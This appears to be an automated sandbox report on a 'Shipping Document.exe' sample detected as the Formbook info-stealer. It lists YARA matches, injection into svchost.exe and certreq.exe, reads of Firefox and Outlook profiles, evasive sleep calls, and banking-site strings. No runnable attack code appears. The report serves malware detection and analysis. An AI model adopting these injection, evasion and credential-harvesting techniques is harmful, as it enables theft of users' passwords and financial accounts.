            Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/11
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102A2D5 GetLastError,FormatMessageW,1_2_0102A2D5
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01018713 AdjustTokenPrivileges,CloseHandle,1_2_01018713
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01018CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_01018CC3
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_0102B59E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0103F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_0103F121
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102C602 CoInitialize,CoCreateInstance,CoUninitialize,1_2_0102C602
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00FC4FE9
            Source: C:\Users\user\Desktop\Shipping Document.exeFile created: C:\Users\user~1\AppData\Local\Temp\autA2D7.tmpJump to behavior
            Source: Shipping Document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: certreq.exe, 00000004.00000003.1862755952.00000000034E9000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.0000000003517000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1862641741.00000000034C8000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3981081238.00000000034E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Shipping Document.exeReversingLabs: Detection: 54%
            Source: Shipping Document.exeVirustotal: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
            Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe"
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeProcess created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe"
            Source: C:\Windows\SysWOW64\certreq.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Shipping Document.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping Document.exe"Jump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeProcess created: C:\Windows\SysWOW64\certreq.exe "C:\Windows\SysWOW64\certreq.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: certcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: certca.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Shipping Document.exeStatic file information: File size 1153024 > 1048576
            Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Shipping Document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: certreq.pdb source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000002.3978300136.000000000010E000.00000002.00000001.01000000.00000004.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3978327377.000000000010E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Shipping Document.exe, 00000001.00000003.1511356261.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, Shipping Document.exe, 00000001.00000003.1507043382.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1670469944.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1670469944.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558086826.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1555960380.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, certreq.exe, 00000004.00000002.3984920272.00000000056AE000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3984920272.0000000005510000.00000040.00001000.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1669727415.00000000051BA000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000003.1674793663.0000000005361000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: certreq.exe, 00000004.00000002.3981081238.0000000003471000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000005B3C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1970178698.000000001694C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: certreq.pdbGCTL source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Shipping Document.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0103C304 LoadLibraryA,GetProcAddress,1_2_0103C304
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE8B85 push ecx; ret 1_2_00FE8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407003 push 88CA774Fh; iretd 2_2_00407013
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A09F push 5D5B5E5Fh; ret 2_2_0041A0A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040196F push ecx; ret 2_2_00401979
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A13F push esp; ret 2_2_0040A141
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040C9C3 pushfd ; iretd 2_2_0040C9C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041198D push ebp; iretd 2_2_0041198F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041324A push edx; iretd 2_2_0041324B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407207 push eax; ret 2_2_0040721D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032C0 push eax; ret 2_2_004032C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A92 push ds; ret 2_2_00401A99
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413398 push esi; iretd 2_2_004133F4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408435 push ebx; retf 2_2_0040843D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACBC push cs; retf 2_2_0040ACBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404D02 push ds; iretd 2_2_00404D03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404DFC push eax; iretd 2_2_00404DFD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401F7D push ebx; iretd 2_2_00401F7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300225F pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030027FA pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300283D push eax; iretd 2_2_03002858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300135E push eax; iretd 2_2_03001369
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055409AD push ecx; mov dword ptr [esp], ecx4_2_055409B6
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F3FCCB push edi; retn B137h4_2_02F3FE78
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F300DA push esi; iretd 4_2_02F30131
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F25172 push ebx; retf 4_2_02F2517A
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F2E6CA push ebp; iretd 4_2_02F2E6CC
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F21A3F push ds; iretd 4_2_02F21A40
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F21B39 push eax; iretd 4_2_02F21B3A
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F279F9 push cs; retf 4_2_02F279FB
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F26E7C push esp; ret 4_2_02F26E7E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00FC4A35
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_010455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_010455FD
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00FE33C7
            Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\certreq.exeWindow / User API: threadDelayed 1059Jump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeWindow / User API: threadDelayed 8913Jump to behavior
            Source: C:\Users\user\Desktop\Shipping Document.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-99571
            Source: C:\Users\user\Desktop\Shipping Document.exeAPI coverage: 4.8 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\certreq.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\certreq.exe TID: 5696Thread sleep count: 1059 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\certreq.exe TID: 5696Thread sleep time: -2118000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exe TID: 5696Thread sleep count: 8913 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\certreq.exe TID: 5696Thread sleep time: -17826000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe TID: 4580Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\certreq.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\certreq.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01024696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_01024696
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102C93C FindFirstFileW,FindClose,1_2_0102C93C
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0102C9C7
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0102F35D
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0102F200
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0102F65E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01023A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_01023A2B
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01023D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_01023D4E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0102BF27
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F3B8A0 FindFirstFileW,FindNextFileW,FindClose,4_2_02F3B8A0
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00FC4AFE
            Source: 33sf7m69.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 33sf7m69.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 33sf7m69.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 33sf7m69.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 33sf7m69.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 33sf7m69.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 33sf7m69.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 33sf7m69.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
